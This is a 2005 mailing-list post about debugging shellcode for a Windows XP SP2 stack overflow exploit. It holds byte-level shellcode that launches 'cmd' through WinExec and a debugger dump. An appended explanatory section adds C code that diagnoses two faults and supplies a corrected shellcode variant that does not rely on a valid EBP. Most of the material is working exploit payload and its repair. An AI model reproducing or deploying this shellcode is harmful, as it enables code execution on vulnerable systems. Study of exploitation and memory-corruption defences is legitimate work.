problem to exploit a stack overflow
From: migalo digalo (l.epsilon@gmail.com)
Date: Tue May 24 2005 - 09:09:56 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi all,
OK, I ran many tests with shellcode that has no 0xcc and 0xc9 ... I
decided to test it with my own shellcode (a very simple one):
unsigned char shellcode[] =
    /* build the string "cmd" in a scratch buffer at [ebp-4]; this relies on
       EBP still pointing at writable stack memory when the code runs.
       As posted, the "\x6A\x01" and "\x8D\x45\xFC" literals each had a
       trailing space inside the quotes, i.e. an extra 0x20 byte; those
       spaces are removed here. */
    "\xC6\x45\xFC\x63"        /* mov byte ptr [ebp-4], 63h   ; 'c' */
    "\xC6\x45\xFD\x6D"        /* mov byte ptr [ebp-3], 6Dh   ; 'm' */
    "\xC6\x45\xFE\x64"        /* mov byte ptr [ebp-2], 64h   ; 'd' */
    "\x33\xC0"                /* xor eax, eax */
    "\x50"                    /* push eax */
    "\x6A\x01"                /* push 1                      ; uCmdShow = SW_SHOWNORMAL */
    "\x8D\x45\xFC"            /* lea eax, [ebp-4]            ; lpCmdLine */
    "\x50"                    /* push eax */
    "\xB8\x4D\x11\x86\x7C"    /* mov eax, 0x7c86114d         ; kernel32!WinExec (poster's XP SP2) */
    "\xFF\xD0"                /* call eax */
    "\x6A\x01"                /* push 1                      ; uExitCode */
    "\xB8\xA2\xCA\x81\x7C"    /* mov eax, 0x7c81caa2         ; kernel32!ExitProcess (poster's XP SP2) */
    "\xFF\xD0";               /* call eax */
and a debug session gives me this:
0012FF34 C6 45 FC 63 mov byte ptr [ebp-4],63h
0012FF38 C6 45 FD 6D mov byte ptr [ebp-3],6Dh
0012FF3C C6 45 FE 64 mov byte ptr [ebp-2],64h
0012FF40 33 C0 xor eax,eax
0012FF42 50 push eax
0012FF43 6A 01 push 1
0012FF45 20 8D 45 FC 20 50 and byte ptr [ebp+5020FC45h],cl
0012FF4B B8 4D 11 86 7C mov eax,7C86114Dh
0012FF50 FF D0 call eax
0012FF52 6A 01 push 1
0012FF54 B8 A2 CA 81 7C mov eax,7C81CAA2h
0012FF59 FF D0 call eax
0012FF5B 90 nop
EAX = 00000001 EBX = 7FFD9000 ECX = 00423AA8
EDX = 00000000 ESI = 00000000 EDI = 0012FF80
EIP = 0012FF34 ESP = 0012FF34 EBP = 90909090
EFL = 00000246 CS = 001B DS = 0023 ES = 0023
SS = 0023 FS = 003B GS = 0000 OV=0 UP=0 EI=1 PL=0
ZR=1 AC=0 PE=1 CY=0
9090908C = ??
ST0 = +0.00000000000000000e+0000
ST1 = +0.00000000000000000e+0000
ST2 = +0.00000000000000000e+0000
ST3 = +0.00000000000000000e+0000
ST4 = +0.00000000000000000e+0000
ST5 = +0.00000000000000000e+0000
ST6 = +0.00000000000000000e+0000
ST7 = +0.00000000000000000e+0000 CTRL = 027F
STAT = 0000 TAGS = FFFF EIP = 00000000 CS = 0000
DS = 0000 EDO = 00000000
So the access violation happened (this time) at the beginning of the
shellcode!!? Is that a security feature in XP SP2, or something
else? Can someone help me understand this?
Thank you
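What the dump above actually shows, checked in code. This is an added example written for this page, not code from the original post: it compares the byte string exactly as posted against the encoding its own comments describe, computes the address the first instruction writes to from the EBP value in the register dump, and sketches a variant of the shellcode that does not depend on EBP. Assumptions, labelled as such: 32-bit Windows with the default 2 GB user/kernel split (user-mode addresses below 0x80000000), the XP SP2 WinExec/ExitProcess addresses copied from the post, and the re-based variant is a suggestion that has not been run against a live target.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The byte string exactly as posted, including the space inside
 * "\x6A\x01 " and inside "\x8D\x45\xFC " (constructed from the post). */
static const unsigned char posted[] =
    "\xC6\x45\xFC\x63" "\xC6\x45\xFD\x6D" "\xC6\x45\xFE\x64"
    "\x33\xC0" "\x50" "\x6A\x01 " "\x8D\x45\xFC " "\x50"
    "\xB8\x4D\x11\x86\x7C" "\xFF\xD0" "\x6A\x01"
    "\xB8\xA2\xCA\x81\x7C" "\xFF\xD0";

/* The encoding the comments in the post describe. */
static const unsigned char intended[] =
    "\xC6\x45\xFC\x63" "\xC6\x45\xFD\x6D" "\xC6\x45\xFE\x64"
    "\x33\xC0" "\x50" "\x6A\x01" "\x8D\x45\xFC" "\x50"
    "\xB8\x4D\x11\x86\x7C" "\xFF\xD0" "\x6A\x01"
    "\xB8\xA2\xCA\x81\x7C" "\xFF\xD0";

/* Suggested variant (assumption, not from the post): do not trust EBP.
 * Re-base EBP on the live stack, reserve scratch space below it so the
 * later pushes cannot overwrite the string, and write the NUL explicitly.
 * The WinExec/ExitProcess addresses are the XP SP2 ones from the post. */
static const unsigned char rebased[] =
    "\x8B\xEC"                  /* mov ebp, esp */
    "\x83\xEC\x10"              /* sub esp, 10h */
    "\xC6\x45\xFC\x63" "\xC6\x45\xFD\x6D" "\xC6\x45\xFE\x64"
    "\xC6\x45\xFF\x00"          /* mov byte ptr [ebp-1], 0 */
    "\x33\xC0" "\x50" "\x6A\x01" "\x8D\x45\xFC" "\x50"
    "\xB8\x4D\x11\x86\x7C" "\xFF\xD0" "\x6A\x01"
    "\xB8\xA2\xCA\x81\x7C" "\xFF\xD0";

/* Walk `got` against `want`; every byte of `got` that breaks the match is
 * reported as stray (its offset stored in `offsets`, up to max_offsets).
 * Returns the total number of stray bytes. */
size_t find_stray_bytes(const unsigned char *got, size_t got_len,
                        const unsigned char *want, size_t want_len,
                        size_t *offsets, size_t max_offsets)
{
    size_t i = 0, j = 0, n = 0;
    while (i < got_len) {
        if (j < want_len && got[i] == want[j]) {
            i++;
            j++;
        } else {
            if (n < max_offsets)
                offsets[n] = i;
            n++;
            i++;
        }
    }
    return n;
}

/* Effective address of an [ebp+disp] operand, e.g. the [ebp-4] that the
 * first mov writes to. Wraps modulo 2^32 like the CPU does. */
uint32_t ebp_relative(uint32_t ebp, int32_t disp)
{
    return ebp + (uint32_t)disp;
}

/* Assumption: default 32-bit Windows layout, user space below 0x80000000.
 * Anything at or above that faults when touched from user mode. */
int is_user_address(uint32_t addr)
{
    return addr < 0x80000000u;
}

int main(void)
{
    size_t off[8];
    size_t n = find_stray_bytes(posted, sizeof posted - 1,
                                intended, sizeof intended - 1, off, 8);
    printf("posted: %zu bytes, intended: %zu bytes, stray: %zu\n",
           sizeof posted - 1, sizeof intended - 1, n);
    for (size_t i = 0; i < n; i++)
        printf("  offset %zu = 0x%02X (at 0x%08X in the dump)\n",
               off[i], posted[off[i]], 0x0012FF34u + (uint32_t)off[i]);

    /* EBP = 90909090 in the register dump: four NOP-sled bytes. */
    uint32_t target = ebp_relative(0x90909090u, -4);
    printf("first write goes to 0x%08X, user-mode address: %s\n",
           target, is_user_address(target) ? "yes" : "no");
    return 0;
}
```

Two separate defects fall out of this. The two trailing spaces inside the string literals add 0x20 bytes at offsets 17 and 21 (0012FF45 and 0012FF49 in the dump), which is why the disassembler decodes `and byte ptr [ebp+5020FC45h],cl` there instead of `lea eax,[ebp-4]`. Those bytes never ran, though: the register dump shows EBP = 90909090, i.e. the saved frame pointer was overwritten by the NOP sled, so the very first instruction writes to 0x9090908C, an address in the kernel half of the 32-bit address space (the debugger's "9090908C = ??" line is the same thing, memory it cannot read). That write faults on any 32-bit Windows regardless of service pack; it is the shellcode's dependence on a sane EBP, not a platform mitigation, and the re-based variant removes that dependence by deriving EBP from ESP first.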